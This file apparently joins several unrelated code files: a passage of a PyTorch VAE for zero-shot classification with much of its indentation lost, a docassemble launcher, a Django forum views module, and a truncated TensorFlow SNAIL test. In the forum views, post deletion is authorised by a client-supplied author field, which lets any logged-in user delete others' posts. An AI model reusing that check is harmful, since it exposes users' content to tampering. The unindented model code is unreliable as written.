for datatype, dim in zip(self.all_data_sources,feature_dimensions):
self.encoder[datatype] = models.encoder_template(dim,self.latent_size,self.hidden_size_rule[datatype],self.device)
print(str(datatype) + ' ' + str(dim))
self.decoder = {}
for datatype, dim in zip(self.all_data_sources,feature_dimensions):
self.decoder[datatype] = models.decoder_template(self.latent_size,dim,self.hidden_size_rule[datatype],self.device)
# An optimizer for all encoders and decoders is defined here
parameters_to_optimize = list(self.parameters())
for datatype in self.all_data_sources:
parameters_to_optimize += list(self.encoder[datatype].parameters())
parameters_to_optimize += list(self.decoder[datatype].parameters())
self.optimizer = optim.Adam( parameters_to_optimize ,lr=hyperparameters['lr_gen_model'], betas=(0.9, 0.999), eps=1e-08, weight_decay=0, amsgrad=True)
        if self.reco_loss_function == 'l2':
            self.reconstruction_criterion = nn.MSELoss(reduction='sum')
        elif self.reco_loss_function == 'l1':
            self.reconstruction_criterion = nn.L1Loss(reduction='sum')
        else:
            raise ValueError(f"Unknown reconstruction loss '{self.reco_loss_function}'; expected 'l1' or 'l2'")
def reparameterize(self, mu, logvar):
if self.reparameterize_with_noise:
sigma = torch.exp(logvar)
eps = torch.cuda.FloatTensor(logvar.size()[0],1).normal_(0,1)
eps = eps.expand(sigma.size())
return mu + sigma*eps
else:
return mu
def forward(self):
pass
def map_label(self,label, classes):
mapped_label = torch.LongTensor(label.size()).to(self.device)
for i in range(classes.size(0)):
mapped_label[label==classes[i]] = i
return mapped_label
def trainstep(self, img, att):
##############################################
# Encode image features and additional
# features
##############################################
mu_img, logvar_img = self.encoder['resnet_features'](img)
z_from_img = self.reparameterize(mu_img, logvar_img)
mu_att, logvar_att = self.encoder[self.auxiliary_data_source](att)
z_from_att = self.reparameterize(mu_att, logvar_att)
##############################################
# Reconstruct inputs
##############################################
img_from_img = self.decoder['resnet_features'](z_from_img)
att_from_att = self.decoder[self.auxiliary_data_source](z_from_att)
reconstruction_loss = self.reconstruction_criterion(img_from_img, img) \
+ self.reconstruction_criterion(att_from_att, att)
##############################################
# Cross Reconstruction Loss
##############################################
img_from_att = self.decoder['resnet_features'](z_from_att)
att_from_img = self.decoder[self.auxiliary_data_source](z_from_img)
cross_reconstruction_loss = self.reconstruction_criterion(img_from_att, img) \
+ self.reconstruction_criterion(att_from_img, att)
##############################################
# KL-Divergence
##############################################
KLD = (0.5 * torch.sum(1 + logvar_att - mu_att.pow(2) - logvar_att.exp())) \
+ (0.5 * torch.sum(1 + logvar_img - mu_img.pow(2) - logvar_img.exp()))
##############################################
# Distribution Alignment
##############################################
distance = torch.sqrt(torch.sum((mu_img - mu_att) ** 2, dim=1) + \
torch.sum((torch.sqrt(logvar_img.exp()) - torch.sqrt(logvar_att.exp())) ** 2, dim=1))
distance = distance.sum()
##############################################
# scale the loss terms according to the warmup
# schedule
##############################################
f1 = 1.0*(self.current_epoch - self.warmup['cross_reconstruction']['start_epoch'] )/(1.0*( self.warmup['cross_reconstruction']['end_epoch']- self.warmup['cross_reconstruction']['start_epoch']))
f1 = f1*(1.0*self.warmup['cross_reconstruction']['factor'])
cross_reconstruction_factor = torch.cuda.FloatTensor([min(max(f1,0),self.warmup['cross_reconstruction']['factor'])])
f2 = 1.0 * (self.current_epoch - self.warmup['beta']['start_epoch']) / ( 1.0 * (self.warmup['beta']['end_epoch'] - self.warmup['beta']['start_epoch']))
f2 = f2 * (1.0 * self.warmup['beta']['factor'])
beta = torch.cuda.FloatTensor([min(max(f2, 0), self.warmup['beta']['factor'])])
f3 = 1.0*(self.current_epoch - self.warmup['distance']['start_epoch'] )/(1.0*( self.warmup['distance']['end_epoch']- self.warmup['distance']['start_epoch']))
f3 = f3*(1.0*self.warmup['distance']['factor'])
distance_factor = torch.cuda.FloatTensor([min(max(f3,0),self.warmup['distance']['factor'])])
##############################################
# Put the loss together and call the optimizer
##############################################
self.optimizer.zero_grad()
loss = reconstruction_loss - beta * KLD
if cross_reconstruction_loss>0:
loss += cross_reconstruction_factor*cross_reconstruction_loss
if distance_factor >0:
loss += distance_factor*distance
loss.backward()
self.optimizer.step()
return loss.item()
def train_vae(self):
losses = []
# self.dataloader = data.DataLoader(self.dataset,batch_size= self.batch_size,shuffle= True,drop_last=True)#,num_workers = 4)
self.dataset.novelclasses =self.dataset.novelclasses.long().cuda()
self.dataset.seenclasses =self.dataset.seenclasses.long().cuda()
#leave both statements
self.train()
self.reparameterize_with_noise = True
print('train for reconstruction')
for epoch in range(0, self.nepoch ):
self.current_epoch = epoch
i=-1
for iters in range(0, self.dataset.ntrain, self.batch_size):
i+=1
label, data_from_modalities = self.dataset.next_batch(self.batch_size)
label= label.long().to(self.device)
for j in range(len(data_from_modalities)):
data_from_modalities[j] = data_from_modalities[j].to(self.device)
data_from_modalities[j].requires_grad = False
loss = self.trainstep(data_from_modalities[0], data_from_modalities[1] )
if i%50==0:
print('epoch ' + str(epoch) + ' | iter ' + str(i) + '\t'+
' | loss ' + str(loss)[:5] )
if i%50==0 and i>0:
losses.append(loss)
# turn into evaluation mode:
for key, value in self.encoder.items():
self.encoder[key].eval()
for key, value in self.decoder.items():
self.decoder[key].eval()
return losses
def train_classifier(self, show_plots=False):
if self.num_shots > 0 :
print('================ transfer features from test to train ==================')
self.dataset.transfer_features(self.num_shots, num_queries='num_features')
history = [] # stores accuracies
cls_seenclasses = self.dataset.seenclasses
cls_novelclasses = self.dataset.novelclasses
train_seen_feat = self.dataset.data['train_seen']['resnet_features']
train_seen_label = self.dataset.data['train_seen']['labels']
novelclass_aux_data = self.dataset.novelclass_aux_data # access as novelclass_aux_data['resnet_features'], novelclass_aux_data['attributes']
seenclass_aux_data = self.dataset.seenclass_aux_data
novel_corresponding_labels = self.dataset.novelclasses.long().to(self.device)
seen_corresponding_labels = self.dataset.seenclasses.long().to(self.device)
# The resnet_features for testing the classifier are loaded here
novel_test_feat = self.dataset.data['test_unseen'][
'resnet_features'] # self.dataset.test_novel_feature.to(self.device)
seen_test_feat = self.dataset.data['test_seen'][
'resnet_features'] # self.dataset.test_seen_feature.to(self.device)
test_seen_label = self.dataset.data['test_seen']['labels'] # self.dataset.test_seen_label.to(self.device)
test_novel_label = self.dataset.data['test_unseen']['labels'] # self.dataset.test_novel_label.to(self.device)
train_unseen_feat = self.dataset.data['train_unseen']['resnet_features']
train_unseen_label = self.dataset.data['train_unseen']['labels']
# in ZSL mode:
if self.generalized == False:
# there are only 50 classes in ZSL (for CUB)
# novel_corresponding_labels =list of all novel classes (as tensor)
# test_novel_label = mapped to 0-49 in classifier function
# those are used as targets, they have to be mapped to 0-49 right here:
novel_corresponding_labels = self.map_label(novel_corresponding_labels, novel_corresponding_labels)
if self.num_shots > 0:
# not generalized and at least 1 shot means normal FSL setting (use only unseen classes)
train_unseen_label = self.map_label(train_unseen_label, cls_novelclasses)
            # for FSL, train_seen contains the unseen class examples
# for ZSL, train seen label is not used
# if self.num_shots>0:
# train_seen_label = self.map_label(train_seen_label,cls_novelclasses)
test_novel_label = self.map_label(test_novel_label, cls_novelclasses)
# map cls novelclasses last
cls_novelclasses = self.map_label(cls_novelclasses, cls_novelclasses)
if self.generalized:
print('mode: gzsl')
clf = LINEAR_LOGSOFTMAX(self.latent_size, self.num_classes)
else:
print('mode: zsl')
clf = LINEAR_LOGSOFTMAX(self.latent_size, self.num_novel_classes)
clf.apply(models.weights_init)
with torch.no_grad():
####################################
# preparing the test set
# convert raw test data into z vectors
####################################
self.reparameterize_with_noise = False
mu1, var1 = self.encoder['resnet_features'](novel_test_feat)
test_novel_X = self.reparameterize(mu1, var1).to(self.device).data
test_novel_Y = test_novel_label.to(self.device)
mu2, var2 = self.encoder['resnet_features'](seen_test_feat)
test_seen_X = self.reparameterize(mu2, var2).to(self.device).data
test_seen_Y = test_seen_label.to(self.device)
####################################
# preparing the train set:
            # choose n random image features per
# class. If n exceeds the number of
# image features per class, duplicate
# some. Next, convert them to
# latent z features.
####################################
self.reparameterize_with_noise = True
def sample_train_data_on_sample_per_class_basis(features, label, sample_per_class):
sample_per_class = int(sample_per_class)
if sample_per_class != 0 and len(label) != 0:
classes = label.unique()
for i, s in enumerate(classes):
features_of_that_class = features[label == s, :] # order of features and labels must coincide
# if number of selected features is smaller than the number of features we want per class:
multiplier = torch.ceil(torch.cuda.FloatTensor(
[max(1, sample_per_class / features_of_that_class.size(0))])).long().item()
features_of_that_class = features_of_that_class.repeat(multiplier, 1)
if i == 0:
features_to_return = features_of_that_class[:sample_per_class, :]
labels_to_return = s.repeat(sample_per_class)
else:
features_to_return = torch.cat(
(features_to_return, features_of_that_class[:sample_per_class, :]), dim=0)
labels_to_return = torch.cat((labels_to_return, s.repeat(sample_per_class)),
dim=0)
return features_to_return, labels_to_return
else:
return torch.cuda.FloatTensor([]), torch.cuda.LongTensor([])
# some of the following might be empty tensors if the specified number of
# samples is zero :
img_seen_feat, img_seen_label = sample_train_data_on_sample_per_class_basis(
train_seen_feat,train_seen_label,self.img_seen_samples )
img_unseen_feat, img_unseen_label = sample_train_data_on_sample_per_class_basis(
train_unseen_feat, train_unseen_label, self.img_unseen_samples )
att_unseen_feat, att_unseen_label = sample_train_data_on_sample_per_class_basis(
novelclass_aux_data,
novel_corresponding_labels,self.att_unseen_samples )
att_seen_feat, att_seen_label = sample_train_data_on_sample_per_class_basis(
seenclass_aux_data,
seen_corresponding_labels, self.att_seen_samples)
def convert_datapoints_to_z(features, encoder):
if features.size(0) != 0:
mu_, logvar_ = encoder(features)
z = self.reparameterize(mu_, logvar_)
return z
else:
return torch.cuda.FloatTensor([])
z_seen_img = convert_datapoints_to_z(img_seen_feat, self.encoder['resnet_features'])
z_unseen_img = convert_datapoints_to_z(img_unseen_feat, self.encoder['resnet_features'])
z_seen_att = convert_datapoints_to_z(att_seen_feat, self.encoder[self.auxiliary_data_source])
z_unseen_att = convert_datapoints_to_z(att_unseen_feat, self.encoder[self.auxiliary_data_source])
train_Z = [z_seen_img, z_unseen_img ,z_seen_att ,z_unseen_att]
train_L = [img_seen_label , img_unseen_label,att_seen_label,att_unseen_label]
# empty tensors are sorted out
train_X = [train_Z[i] for i in range(len(train_Z)) if train_Z[i].size(0) != 0]
train_Y = [train_L[i] for i in range(len(train_L)) if train_Z[i].size(0) != 0]
train_X = torch.cat(train_X, dim=0)
train_Y = torch.cat(train_Y, dim=0)
############################################################
##### initializing the classifier and train one epoch
############################################################
cls = classifier.CLASSIFIER(clf, train_X, train_Y, test_seen_X, test_seen_Y, test_novel_X,
test_novel_Y,
cls_seenclasses, cls_novelclasses,
self.num_classes, self.device, self.lr_cls, 0.5, 1,
self.classifier_batch_size,
self.generalized)
for k in range(self.cls_train_epochs):
if k > 0:
if self.generalized:
cls.acc_seen, cls.acc_novel, cls.H = cls.fit()
else:
cls.acc = cls.fit_zsl()
if self.generalized:
print('[%.1f] novel=%.4f, seen=%.4f, h=%.4f , loss=%.4f' % (
k, cls.acc_novel, cls.acc_seen, cls.H, cls.average_loss))
history.append([torch.tensor(cls.acc_seen).item(), torch.tensor(cls.acc_novel).item(),
torch.tensor(cls.H).item()])
else:
print('[%.1f] acc=%.4f ' % (k, cls.acc))
history.append([0, torch.tensor(cls.acc).item(), 0])
if self.generalized:
return torch.tensor(cls.acc_seen).item(), torch.tensor(cls.acc_novel).item(), torch.tensor(
cls.H).item(), history
else:
return 0, torch.tensor(cls.acc).item(), 0, history
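# Illustrative sketch of the reparameterization trick used in Model.reparameterize
# above, written standalone on the CPU (the class itself draws its noise with
# torch.cuda.FloatTensor); the shapes below are made up for the demonstration.
if __name__ == '__main__':
    mu = torch.zeros(4, 64)
    logvar = torch.zeros(4, 64)
    sigma = torch.exp(logvar)  # the model exponentiates logvar directly to obtain sigma
    eps = torch.randn(mu.size(0), 1).expand(sigma.size())  # one noise value per row, shared across dims
    z = mu + sigma * eps
    print(z.shape)  # torch.Size([4, 64])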
|
from docassemble.webapp.server import app as application
if __name__ == "__main__":
application.run(host='0.0.0.0')
|
from django.shortcuts import render, redirect, HttpResponse
from .models import Issue, Comment, UserProfile, TeacherProfile, Tags
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.template.defaultfilters import slugify
from random import randint
from datetime import datetime
import ast
from .spamfilter import plino
from django.core.mail import send_mail
messages = {
"404": {
"code": 404,
"status": "Page not found",
"message": "Oops! The page you are looking for does not exist. It might have been moved or deleted."
},
"403": {
"code": 403,
"status": "Forbidden",
"message": '"Tresspassers will be prosecuted." ~ Developers'
},
"500": {
"code": 500,
"status": "Server Error",
"message": "Houston! We have a problem! Please report to the site administrator."
},
}
# Create your views here.
##################################################### For index and error pages #####################################################
def index(request):
try:
if request.user.is_authenticated:
params = {'issues': Issue.objects.all()}
params["page_title"] = "Posted Issues"
return render(request, 'forum/index.html', params)
else:
return redirect('/forum/login')
except Exception as e:
return errorPage(request, messages["500"])
def errorPage(request, args=messages["404"], **kwargs):
try:
return render(request, 'forum/errorpage.html', args)
except Exception as e:
return errorPage(request, messages["500"])
##################################################### End index and error pages #####################################################
##################################################### For User authentication and related activities #####################################################
def signup(request):
try:
if request.user.is_authenticated:
return redirect('/forum/')
else:
return render(request, 'forum/signup.html')
except Exception as e:
return errorPage(request, messages["500"])
def loggedin(request):
try:
if request.user.is_authenticated:
return redirect('/forum/')
else:
return render(request, 'forum/login.html')
except Exception as e:
return errorPage(request, messages["500"])
def loginUser(request):
try:
if request.method == 'POST':
# return HttpResponse("<h1>This is the redirect page.<h1>")
loginuser = request.POST.get('loginuser')
loginpasswd = request.POST.get('loginpasswd')
user = authenticate(username=loginuser, password=loginpasswd)
if user is not None:
login(request, user)
return redirect('/forum/dashboard/')
else:
return HttpResponse("<h1>Credentials don't match.</h1>")
else:
return errorPage(request, messages["403"])
except Exception as e:
return errorPage(request, messages["500"])
def logoutUser(request):
try:
# if request.method == 'POST':
logout(request)
# return HttpResponse("<h1>You've been successfully logged out.</h1>")
return redirect('/forum/')
except Exception as e:
return errorPage(request, messages["500"])
def newUser(request):
try:
if request.method == 'POST':
email = request.POST.get('email')
password = request.POST.get('passwd', None)
cpassword = request.POST.get('cpasswd', None)
username = email
role = request.POST.get('role', 'student')
image = request.FILES.get('profilepic')
print(f"\n\n\n\n{role}\n\n")
print(f"\n\n\n\n{User.objects.all()}\n\n")
try:
if cpassword == password:
myuser = User.objects.create_user(username, email, password)
print(f"\n\n\n\n{myuser.__dict__}\n\n")
# return HttpResponse("<h1>This is the redirect page.<h1>")
myuser.first_name = request.POST.get('fname')
myuser.last_name = request.POST.get('lname')
myuser.middle_name = request.POST.get('mname', None)
# myuser.roll = request.POST.get('rollno')
# myuser.reputation = 0
myuser.save()
myprofile = None
if role == 'student':
myprofile = UserProfile(reputation=0, rollno = request.POST.get('rollno'), user=myuser, username=username, profilepic=image)
elif role == 'teacher':
myprofile = TeacherProfile(reputation=0, rollno = request.POST.get('rollno'), user=myuser, username=username, tags=[{"tags": []}], profilepic=image)
print(f"\n\n\n\n{myprofile.__dict__}\n\n")
myprofile.save()
# authenticate(username=username, password=password)
# messages.success(request, "Your account has been successfully created!")
# return HttpResponse(f"<h1>Your account has been successfully created! Your username is: {myuser.username}. Save it somewhere.</h1>")
msg = {
"code": "Welcome!",
"status": "Congratulations! Your account has been created!",
"message": f"Your account has been successfully created! Your username is: {myuser.username}. Save it somewhere."
}
return errorPage(request, msg)
# return redirect('/forum/dashboard')
elif cpassword != password:
# return HttpResponse("<h1>Error - Passwords don't match.</h1>")
msg = {
"code": "Error",
"status": "Uh oh! Your passwords don't match :(",
"message": "Try signing up again, with matching passwords. No worries - we'll be waiting! :D"
}
return errorPage(request, msg)
                elif User.objects.filter(username=username).exists():
return redirect('/forum/login')
except Exception as e:
msg = {
"code": "Error",
"status": "Houston! We've got a problem! :(",
"message": f"Please Report the administration about the problem as soon as possible! Tell them the error: {e.message}"
}
return errorPage(request, msg)
# return HttpResponse(f"<h1>An Error Occured. Error details: {e}</h1>")
else:
return errorPage(request, messages["403"])
except Exception as e:
return errorPage(request, messages["500"])
def passwordReset(request):
return HttpResponse("<h1>Password Reset</h1>")
# def sendMessage(message, args={}):
# def verifyCode(request, slug):
# num =
##################################################### End User authentication and related activities #####################################################
##################################################### For User Activities #####################################################
def blogPost(request, slug):
try:
issue = Issue.objects.filter(slug=slug)
comments = Comment.objects.filter(issue=issue.first())
if list(issue) == []:
# return HttpResponse("<h1>404 - Post not available!</h1>")
            return errorPage(request, messages["404"])
else:
params = dict(issue.values()[0])
print(f"\n\n\n{params}\n\n\n")
params["comments"] = comments
return render(request, 'forum/issue.html', params)
except Exception as e:
return errorPage(request, messages["404"])
def newPost(request):
try:
if not request.user.is_authenticated:
return redirect('/forum/login/')
else:
return render(request, 'forum/post.html')
except Exception as e:
return errorPage(request, messages["500"])
def uploadPost(request):
try:
if request.method == "POST":
user = request.user
subject = request.POST.get('subject')
summary = request.POST.get('summary')
description = request.POST.get('description')
# if plino(description):
# return HttpResponse("<h1>Really very very sorry fam,<br>your comment has been marked as spam.</h1>")
image = request.FILES.get('myfile')
is_anonymous = request.POST.get("anonymize", "off")
# print(image)
author = request.user.username if is_anonymous == "off" else "Anonymous"
slug = slugify(f"{subject.lower()}-{author.lower()}")
tags = TagsProcessor(request, "post", {"author": author, "slug": slug})
post = None
if image is not None:
post = Issue(user=user, subject=subject, summary=summary, description=description, image=image, author=author, slug=slug, tags=tags)
else:
post = Issue(user=user, subject=subject, summary=summary, description=description, author=author, slug=slug, tags=tags)
post.save()
return redirect('/forum/')
else:
return errorPage(request, messages["403"])
except Exception as e:
return errorPage(request, messages["500"])
def userProfile(request, slug):
try:
user = User.objects.filter(username=slug)
user_issues = Issue.objects.filter(author=slug)
params = dict(user.values()[0])
params["user_issues"] = list(user_issues.values())
params["comments"] = list(Comment.objects.filter(username=slug).values())
profileType = None
profilepic = ''
if UserProfile.objects.filter(username=slug).exists():
profileType = "Student"
profilepic = UserProfile.objects.filter(username=slug).first().profilepic
elif TeacherProfile.objects.filter(username=slug).exists():
profileType = "Faculty"
profilepic = TeacherProfile.objects.filter(username=slug).first().profilepic
else:
profileType = "Unknown"
params["profileType"] = profileType
params["profilepic"] = profilepic
if list(user) == []:
msg = {
"code": 404,
"status": "Username not found :(",
"message": f"The username {slug} you've been searching for is not available in our data. :( Maybe the user deleted their account, or is Anonymous?"
}
return errorPage(request, msg)
# return HttpResponse("<h1>Username not found!</h1>")
elif request.user.username == slug:
return redirect('/forum/dashboard/')
else:
return render(request, 'forum/user.html', params)
except IndexError:
# return HttpResponse("<h1>Username not found!</h1>")
msg = {
"code": 404,
"status": "Username not found :(",
"message": f"The username {slug} you've been searching for is not available in our data. :( Maybe the user deleted their account, or is Anonymous?"
}
return errorPage(request, msg)
except Exception as e:
return errorPage(request, messages["500"])
def dashboard(request):
try:
if request.user.is_authenticated:
activity = list(Issue.objects.filter(user=request.user))
data = User.objects.filter(username = request.user.username)
profile = UserProfile.objects.filter(username = request.user.username).first()
if request.user.is_superuser:
return redirect("/admin/")
isTeacher = False
            if profile is None:
profile = TeacherProfile.objects.filter(username = request.user.username).first()
isTeacher = True
params = dict(data.values()[0])
params["activity"] = activity
params["rollno"] = profile.__dict__["rollno"] if not request.user.is_superuser else "NA"
params["reputation"] = profile.__dict__["reputation"] if not request.user.is_superuser else "Inf"
params["profilepic"] = profile.__dict__["profilepic"] if not request.user.is_superuser else ''
if isTeacher:
params["tags"] = profile.__dict__["tags"]
comments_activity = list(Comment.objects.filter(username=request.user.username))
params["comments"] = comments_activity
# print(params)
# return HttpResponse(f"<h1>This will be the Dashboard for {request.user.username}</h1>")
if isTeacher:
a = list(Tags.objects.all())
username = request.user.username
ls = []
for i in a:
if username in i.usernames:
ls.append(i)
params["notifications"] = ls
myprof = TeacherProfile.objects.filter(username=username).first()
ls2 = [x.label for x in ls]
if myprof is not None:
myprof.tags = ls2
myprof.save()
print(f"\n\n\n{ls}\n\n\n")
if isTeacher:
return render(request, 'forum/staff/dashboard.html', params)
else:
return render(request, 'forum/student/dashboard.html', params)
else:
return redirect('/forum/login')
except Exception as e:
return errorPage(request, messages["500"])
def postComment(request):
try:
if request.method == 'POST':
comment = request.POST.get("comment")
user = request.user
postId = request.POST.get("postId")
# print("\n\n\n\n" + postId + str(type(postId)) + "\n\n\n")
slug = request.POST.get("postSlug")
issues = Issue.objects.filter(sno=postId).first()
username = request.user.username
tags = TagsProcessor(request, "comment", {"author": username, "slug": slug})
# comment_slug = issue_slug + '-' + datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
if not plino(comment):
obj = Comment(description=comment, issue=issues, user=user, username=username, slug=slug, tags=tags)
obj.save()
return redirect(f'/forum/post/{slug}')
else:
msg = {
"code": "Spam",
"status": "Spam detected",
"message": "Really very very sorry fam,<br>your comment has been marked as spam."
}
return errorPage(request, msg)
else:
# return HttpResponse("<h1>HTTP 403 - Forbidden</h1>")
return errorPage(request)
except Exception as e:
return errorPage(request, messages["500"])
def deletePost(request, slug):
try:
if request.method == "POST":
postId = request.POST.get("postId")
author = request.POST.get("poster")
postSlug = None
a = None
if slug == "issue":
a = Issue.objects.filter(sno=postId).first()
print(f"\n\nPost: \n\n{a}\n\n")
elif slug == "comment":
a = Comment.objects.filter(sno=postId).first()
print(f"\n\nComment: \n\n{a}\n\n")
postSlug = str(a.slug)
print(f"\n\n{request.user.username}")
print(f"\n\n{author}")
if request.user.username == author or request.user.is_superuser:
a.delete()
if slug == "issue":
return redirect("/forum/")
elif slug == "comment":
return redirect(f"/forum/post/{postSlug}")
else:
msg = dict(messages["403"])
msg["message"] = "Hippity hoppity floppity, the post isn't your property :P"
return errorPage(request, msg)
# return HttpResponse("<h1>Hippity hoppity floppity, the post isn't your property :P")
else:
return errorPage(request, messages["403"])
except Exception as e:
return errorPage(request, messages["500"])
##################################################### End User Activities #####################################################
##################################################### For voting #####################################################
def voteUp(request):
if request.user.is_authenticated:
if request.method == 'POST':
postId = request.POST.get("postId")
author = request.POST.get("poster")
issues = Issue.objects.filter(sno=postId).first()
user = User.objects.filter(username=author).first()
userprofile = None # list(set([TeacherProfile.objects.filter(username=author).first(), UserProfile.objects.filter(username=author).first()]))[0] # if not (user.is_superuser or user.is_staff) else None
if TeacherProfile.objects.filter(username=author).first() is not None:
userprofile = TeacherProfile.objects.filter(username=author).first()
else:
userprofile = UserProfile.objects.filter(username=author).first()
# print("UserProfile:", userprofile.__dict__)
# print("\n\nUser:", user.__dict__)
slug = issues.slug
# if num in [-1, 1] and list(issues) != []:
issues.votes += 1
if user is not None and author != "Anonymous" and user.is_superuser == False and user.is_staff == False:
                userprofile.reputation += 1
                userprofile.save()
issues.save()
user.save()
else:
return errorPage(request, messages["403"])
return redirect(f'/forum/post/{slug}')
else:
return redirect('/forum/login/')
def voteDown(request):
if request.user.is_authenticated:
if request.method == 'POST':
postId = request.POST.get("postId")
author = request.POST.get("poster")
issues = Issue.objects.filter(sno=postId).first()
user = User.objects.filter(username=author).first()
# print(f"\n\n{user}\n\n")
userprofile = None # list(set([TeacherProfile.objects.filter(username=author).first(), UserProfile.objects.filter(username=author).first()]))[0] # if not (user.is_superuser or user.is_staff) else None
if TeacherProfile.objects.filter(username=author).first() is not None:
userprofile = TeacherProfile.objects.filter(username=author).first()
else:
userprofile = UserProfile.objects.filter(username=author).first()
# print(f"\n\n{userprofile}\n\n")
# print("UserProfile:", userprofile.__dict__)
# print("\n\nUser:", user.__dict__)
slug = issues.slug
# if num in [-1, 1] and list(issues) != []:
if user is not None and author != "Anonymous" and user.is_superuser == False and user.is_staff == False:
userprofile.reputation -= 1
userprofile.save()
issues.votes -= 1
issues.save()
user.save()
else:
return errorPage(request, messages["403"])
return redirect(f'/forum/post/{slug}')
else:
return redirect('/forum/login/')
def tvoteUp(request):
if request.user.is_authenticated:
if request.method == 'POST':
# postId = request.POST.get("postId")
            tags = ast.literal_eval(request.POST.get("postTags"))  # safe literal parsing instead of eval
print(f"\n\n\n{tags}\t{type(tags)}\n\n\n")
# issues = Issue.objects.filter(id=postId).first()
# user = User.objects.filter(username=author).first()
usernames_list = []
# teachers_list = []
for tagname in tags:
print(f"\n{tagname}\n")
usernames_list += Tags.objects.filter(label=tagname).first().usernames
usernames_list = list(set(usernames_list))
print(f"\n{usernames_list}\n")
for i in usernames_list:
print(f"\n{i}\n")
teacheruser = TeacherProfile.objects.filter(username=i).first()
print(f"\n{teacheruser}\n")
if teacheruser is not None:
teacheruser.reputation += 1
teacheruser.save()
# return HttpResponse("Don't you think the authorities are awesome? :D")
msg = {
"code": ":)",
"status": "Kudos to the authorities!",
"message": "Your upvote has been successfully recorded. Don't you think the authorities are awesome? :D",
}
return errorPage(request, msg)
else:
msg = dict(messages["403"])
msg["message"] = '"There are no shortcuts to votes :)" ~ Developers'
return errorPage(request, msg)
else:
return redirect('/forum/login')
def tvoteDown(request):
if request.user.is_authenticated:
if request.method == 'POST':
# postId = request.POST.get("postId")
            tags = ast.literal_eval(request.POST.get("postTags"))  # safe literal parsing instead of eval
print(f"\n\n\n{tags}\t{type(tags)}\n\n\n")
# issues = Issue.objects.filter(id=postId).first()
# user = User.objects.filter(username=author).first()
usernames_list = []
# teachers_list = []
for tagname in tags:
print(f"\n{tagname}\n")
usernames_list += Tags.objects.filter(label=tagname).first().usernames
usernames_list = list(set(usernames_list))
print(f"\n{usernames_list}\n")
for i in usernames_list:
print(f"\n{i}\n")
teacheruser = TeacherProfile.objects.filter(username=i).first()
print(f"\n{teacheruser}\n")
if teacheruser is not None:
teacheruser.reputation -= 1
teacheruser.save()
msg = {
"code": ":(",
"status": "So sorry to know that...",
"message": "Your downvote has been successfully recorded. Maybe they'll look into it now?",
}
return errorPage(request, msg)
# return HttpResponse("So sorry to know that :(... Maybe they'll look into it now?")
else:
# return HttpResponse('"There are no shortcuts to votes :)" ~ Developers')
msg = dict(messages["403"])
msg["message"] = '"There are no shortcuts to votes :)" ~ Developers'
return errorPage(request, msg)
else:
return redirect('/forum/login')
##################################################### End voting #####################################################
##################################################### For search and leaderboards #####################################################
def search(request):
issues = list(Issue.objects.all())
query = request.POST.get('search')
results_list = []
init = datetime.now()
for i in issues:
idict = i.__dict__
for j in idict.keys():
if j != '_state':
if isinstance(idict[j],str):
if query.lower() in idict[j].lower():
results_list.append(i)
results_list = list(set(results_list))
params = {'issues': results_list}
params["page_title"] = f"Showing {len(results_list)} search results for '{query}' in {(datetime.now() - init).total_seconds()} seconds"
return render(request, 'forum/index.html', params)
def StudentLeaderBoard(request):
users = list(UserProfile.objects.all())
users.sort(key = lambda x: x.reputation, reverse=True)
params = {}
params["page_title"] = "Student Leaderboard"
params["users"] = users
return render(request, 'forum/student/leaderboard.html', params)
def TeacherLeaderBoard(request):
users = list(TeacherProfile.objects.all())
users.sort(key = lambda x: x.reputation, reverse=True)
params = {}
params["page_title"] = "Staff Leaderboard"
params["users"] = users
return render(request, 'forum/staff/leaderboard.html', params)
##################################################### End search and leaderboards #####################################################
##################################################### For tags #####################################################
def TagsProcessor(request, mode, args):
text = request.POST.get("tags")
    taglist = list(set(slugify(x.strip().lower()) for x in text.strip().split(",")))
tags_all = [x.label for x in Tags.objects.all()]
username = request.user.username
if mode == "post":
for i in taglist:
if i not in tags_all:
newtag = Tags(label=i, usernames=[], issues=[], comments=[])
newtag.save()
for i in taglist:
a = Tags.objects.filter(label=i).first()
a.issues.append(args["slug"])
a.usernames.append(args["author"])
a.usernames = list(set(a.usernames))
a.issues = list(set(a.issues))
a.save()
elif mode == "comment":
for i in taglist:
if i not in tags_all:
newtag = Tags(label=i, usernames=[], issues=[], comments=[])
newtag.save()
for i in taglist:
a = Tags.objects.filter(label=i).first()
a.comments.append(args["slug"])
a.usernames.append(args["author"])
a.usernames = list(set(a.usernames))
a.comments = list(set(a.comments))
a.save()
return taglist
def showTag(request, slug):
tags = Tags.objects.filter(label=slug).first()
if tags is not None:
# return HttpResponse(f"<h1>This is the tag page of {slug}</h1>")
return render(request, 'forum/tag.html', tags.__dict__)
else:
msg = dict(messages["404"])
msg["status"] = "That's the wrong way."
msg["message"] = f"Tag '{slug}' doesn't exist. It may have been deleted, or might have never existed."
return errorPage(request, msg)
##################################################### End tags #####################################################
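# Illustrative note on TagsProcessor above (as comments, since this module only
# imports inside the Django app): the tag field is split on commas, trimmed,
# lower-cased, slugified and de-duplicated, e.g. with a made-up input:
#   >>> sorted({slugify(part.strip().lower()) for part in "Exams , Hostel Mess, exams".split(",")})
#   ['exams', 'hostel-mess']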
|
# coding=utf-8
# Copyright 2019 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for SNAIL."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from six.moves import range
from tensor2robot.layers import snail
import tensorflow.compat.v1 as tf
class SNAILTest(tf.test.TestCase):
def test_CausalConv(self):
x = tf.random.normal((4, 10, 8))
y = snail.CausalConv(x, 1, 5)
self.assertEqual(y.shape, (4, 10, 5))
def test_DenseBlock(self):
x = tf.random.normal((4, 10, 8))
y = snail.DenseBlock(x, 1, 5)
self.assertEqual(y.shape, (4, 10, 13))
def test_TCBlock(self):
sequence_length = 10
x = tf.random.normal((4, sequence_length, 8))
y = snail.TCBlock(x, sequence_length, 5)
self.assertEqual(y.shape, (4, 10, 8 + 4*5))
def test_CausallyMaskedSoftmax(self):
num_rows = 5
x = tf.random.normal((num_rows, 3))
